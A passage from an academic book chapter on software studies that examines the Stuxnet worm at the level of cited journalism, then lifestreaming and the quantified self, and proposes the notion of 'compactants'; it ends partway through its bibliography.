This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
